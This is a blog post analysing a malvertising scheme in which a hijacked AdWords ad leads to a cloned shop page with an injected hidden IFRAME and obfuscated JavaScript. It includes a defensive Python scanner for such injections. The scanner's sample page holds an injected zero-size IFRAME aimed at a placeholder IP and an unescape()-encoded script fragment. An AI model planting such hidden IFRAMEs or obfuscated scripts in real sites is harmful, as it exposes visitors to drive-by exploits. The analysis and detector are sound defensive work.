A typical approach to spreading malware is to hack a site and then inject an IFRAME pointing towards some obfuscated Javascript that then eventually connects to a site with an exploit.
From the point of view of an attacker, this is fine. But what if the natural traffic for the site isn't enough?
Here's one I came across today with a completely new twist.
In this particular case, our antivirus software came up with an alert for what appeared to be some variant of the JS/Petch trojan. The machine didn't appear to be infected, but I investigated further. (Just to be clear, it wasn't my machine!)
An analysis of the machine indicated that this particular user had been doing some fairly innocent lunchtime surfing looking for a particular product... let's say widgets.
In this case, the user went to Google and searched for "widgets" and got the usual load of search results complete with a set of ads along the top and down the side - normal Google AdWords ads. This user then clicked on the top ad, apparently promoting a company that we will call widgetsgb.com... which is where it gets interesting.
Instead of being taken to widgetsgb.com, Google directed the visitor to another site. This in itself is not unusual; sometimes different domains are used for tracking or whatever. However, in this case the site was completely unrelated... say notwidgetsatall.co.uk, in which was buried an exact copy of the front page of widgetsgb.com. So the front page of notwidgetsatall.co.uk looked completely normal, but in a subdirectory, notwidgetsatall.co.uk/widgets, was an exact copy of the other site.
Well, not an exact copy precisely. This version had some IFRAME goodness pointing to an IP in Germany which had the obfuscated javascript pointing elsewhere. It doesn't really matter where.
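For anyone who wants to check a suspect page for this kind of thing, here is a small scanner I've added as an illustration (it is my own example code, not anything from the sites in this post). It parses an HTML body, flags IFRAMEs that are hidden (zero or one pixel in size, or styled invisible), that point at a raw IP address rather than a hostname, or that point off-site, and flags inline scripts carrying the usual obfuscation markers (unescape(), eval(), String.fromCharCode, long runs of %XX escapes). The sample page, the page URL and the 192.0.2.10 address are all made up for the example; the real copy described above was pointing at a German IP that I'm not going to reproduce here.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample page: a "cloned" widget shop with one legitimate off-site
# embed, one injected hidden IFRAME pointing at a raw IP (192.0.2.10 is an
# RFC 5737 documentation address, chosen so nothing real is referenced), and
# one obfuscated inline script. This is example data, not the real page.
SAMPLE_HTML = """<html><head><title>Widgets GB - cheap widgets</title></head>
<body>
<h1>Welcome to Widgets GB</h1>
<iframe src="https://www.example.com/embed/video" width="560" height="315"></iframe>
<p>Buy widgets.</p>
<iframe src="http://192.0.2.10/in.cgi?3" width="0" height="0" style="visibility:hidden"></iframe>
<script>document.write(unescape('%3C%73%63%72%69%70%74%20%73%72%63%3D%22'));</script>
</body></html>
"""

# Dotted-quad host, i.e. an IFRAME src with no DNS name behind it.
IP_RE = re.compile(r"^(\d{1,3}\.){3}\d{1,3}$")

# Markers commonly seen in obfuscated injected JavaScript.
OBFUSCATION_RE = re.compile(
    r"unescape\(|eval\(|String\.fromCharCode|(%[0-9a-fA-F]{2}){8,}"
)


def _dim(value):
    """Parse a width/height attribute like '0' or '1px'; None if not numeric."""
    try:
        return int(value.strip().lower().rstrip("px"))
    except (AttributeError, ValueError):
        return None


def _is_hidden(attrs):
    """True for 0/1-pixel frames or frames styled display:none/visibility:hidden."""
    for key in ("width", "height"):
        d = _dim(attrs.get(key))
        if d is not None and d <= 1:
            return True
    style = (attrs.get("style") or "").replace(" ", "").lower()
    return "display:none" in style or "visibility:hidden" in style


class InjectScanner(HTMLParser):
    """Collects suspicious IFRAMEs and obfuscated inline scripts from a page."""

    def __init__(self, page_host):
        super().__init__()
        self.page_host = page_host
        self.findings = []
        self._in_script = False
        self._script_buf = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "iframe":
            self._check_iframe(a)
        elif tag == "script":
            self._in_script = True
            self._script_buf = []

    def handle_endtag(self, tag):
        if tag == "script" and self._in_script:
            self._in_script = False
            code = "".join(self._script_buf)
            if OBFUSCATION_RE.search(code):
                self.findings.append(
                    {"kind": "script", "reason": "obfuscation-marker",
                     "snippet": code[:60]}
                )

    def handle_data(self, data):
        # HTMLParser delivers <script> bodies through handle_data.
        if self._in_script:
            self._script_buf.append(data)

    def _check_iframe(self, a):
        src = a.get("src") or ""
        host = urlparse(src).hostname or ""
        reasons = []
        if _is_hidden(a):
            reasons.append("hidden")
        if IP_RE.match(host):
            reasons.append("raw-ip")
        if host and host != self.page_host:
            reasons.append("off-site")
        if reasons:
            # Off-site alone is normal (embeds, ad tags); hidden or raw-IP is not.
            severity = "high" if {"hidden", "raw-ip"} & set(reasons) else "low"
            self.findings.append(
                {"kind": "iframe", "src": src, "reasons": reasons,
                 "severity": severity}
            )


def scan_html(html, page_url):
    """Return a list of findings for the page body fetched from page_url."""
    scanner = InjectScanner(urlparse(page_url).hostname or "")
    scanner.feed(html)
    scanner.close()
    return scanner.findings


if __name__ == "__main__":
    for f in scan_html(SAMPLE_HTML, "http://notwidgetsatall.co.uk/widgets/index.html"):
        print(f)
```

The obvious limitation is that this only sees what is in the HTML you fetched; an injected script that builds the IFRAME at runtime, or a server that only serves the bad version to certain referrers or user agents (the paid-ad click being exactly such a referrer), will not show up unless you fetch the page the way the victim did.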
What was interesting about this whole thing was that the user had clicked on a paid ad rather than a natural search result. Which means that somebody had to pay for the click... and by the looks of things that somebody had to pay a respectable amount to get the number one position. Of course, the bad guys never pay for anything as it would be uneconomic for them, so the indications are that they were using a hacked AdWords account.
What is strange about this whole thing is the amount of effort that the bad guys put into this... they targeted a niche site without an awful lot of traffic, made a duplicate and then set up an advertising campaign to drive what was presumably not an awful lot of clicks to their IFRAME.
I guess the AdWords account was picked up with a keylogger installed on another hacked machine. It's the first time I've seen AdWords used in this way, but it shows that the bad guys can squeeze the value out of just about anything.